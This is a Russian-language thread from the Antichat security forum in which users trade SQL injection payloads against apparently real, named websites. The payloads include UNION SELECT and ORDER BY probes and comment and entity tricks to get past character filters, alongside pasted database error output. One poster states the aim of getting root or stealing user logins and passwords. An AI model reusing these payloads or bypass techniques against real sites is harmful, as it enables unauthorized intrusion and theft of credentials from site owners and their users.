ANTICHAT — форум по информационной безопасности, OSINT и технологиям

пробуй посимвольно, как - смотри на форуме.

http://www.ipodmania.ru/index.php?state=catalogs&activeCategory='182
что-то никак не осилю)

Кто шарит подскажите ....
просканил сайт Acunetix
типа уязвимый скрипт http://rhost.com/login.php
(The POST variable logf has been set to \'.) - из отчета Acunetix

Это форма из трех полей ввода: логин, пароль и плюс контрольное слово (с картинки)
Инфа о сервере: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7g PHP/5.2.1
параметры ' %27 %00' \' и тд типа проходят
вместо параметра id там походу используется op покрайней мере при входе на сайт под логином обычного юзверя почти

все ссылки внутри выглядят типа так:
http:/rhost.com/index.php?op=new_pro
В общем долго я извращался на тему:

http://rhost.com/login.php?op=-new_pro+ORDER+BY+8/*
http://rhost.com/login.php?op=-23+ORDER+BY+8/*
ну и тд и тп и пр ...(перепробовал уже кучу всего)

На все запросы выдает все тоже окно из 3х полей но каждый раз с новой картинкой
Вот исходный код зласчастной страницы:
<HTML><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
<LINK href="../themes/style.css" rel=stylesheet>
<body background="./images/bkgnd.gif" link="#FEE685" alink="#FEE685" vlink="#FEE685" leftmargin="0" topmargin="10">
<center><form ENCTYPE="multipart/form-data" action="login.php?op=enter" method=post>
<br><br>
<table border="0"><tr><td align="right"><font color="#A6D2C3">Логин</font></td>
<td><input type="text" name=logf size="15"></td></tr>
<tr><td align="right"><font color="#A6D2C3">Пароль</font></td>
<td><input type="password" name=pasf size="15"></td></tr>
<tr><td align="right"><font color="#A6D2C3">Код</font></td>
<td><input type="text" name="code" size="15"></td><td><img src="img.php"</td></tr>
<tr><td></td><td><a class="menu" href="register.php">Новый пользователь</a></td></tr>
<tr>
<td><br><input type="submit" name=enteradmin value="Войти"></td>
<td><br><input type="reset" value="Очистить" name="Reset"></center></td></tr></table>
<p>&nbsp;</p></div></form>
</BODY><HTML>

Вопросы следующие:
1. Значения параметра op= на сайте только текстовые (без чисел) - правильны ли мои попытки..??
2. Корректно ли вводить op= в случае с login.php а не с index.php
3. Не является ли препятствием то самое третье поле с картинки..??
4. У кого какие мысли ... в идеале нужен root или хотябы логины пароли простых юзверей

http://www.p2p-forum.lt/index.php?sid=64c04cbc9333171625ab19a953c981b4

спасибо

Применять фильтр?

id=-99999+union+select+1,2,3,4,5,6,7,8

Warning: pg_query()

Query failed: ERROR: UNION types character varying and integer cannot be matched in /var/www/....

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/.....

А если id=-99999+union+select+1,USER(),3,4,5,6,7,8
ТО
Query failed: ERROR: syntax error at or near "(" at character 63 in /var/www....

Понял, такая конструкция проходит

Но что теперь?
Опять выдаёт ошибку

Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near "(" at character 71 in /var/www/....../htdocs/inc/class.file.php on line 22

Warning: pg_fetch_object() expects parameter 1 to be resource, boolean given in /var/www/..........
htdocs/inc/class.file.php on line 23

АААА понял, скобку фильтрует сервер.
Вопрос: Как обойти?!

Как я понял фильтрация идёт на "." и на "," как можно обойти?!

ААА кто поможет?
foto.php?id=-1+union+select+1,user&#46password,null,4,null,6,7,8+from+user&#46password

maad может быть вот так /**/
у меня др вопрос, че можно с этим с делать
http://www.yavlinsky.ru/smart_talk/index.phtml?id=30%20union%20select%201,2,3/*

не могу найти поля логинов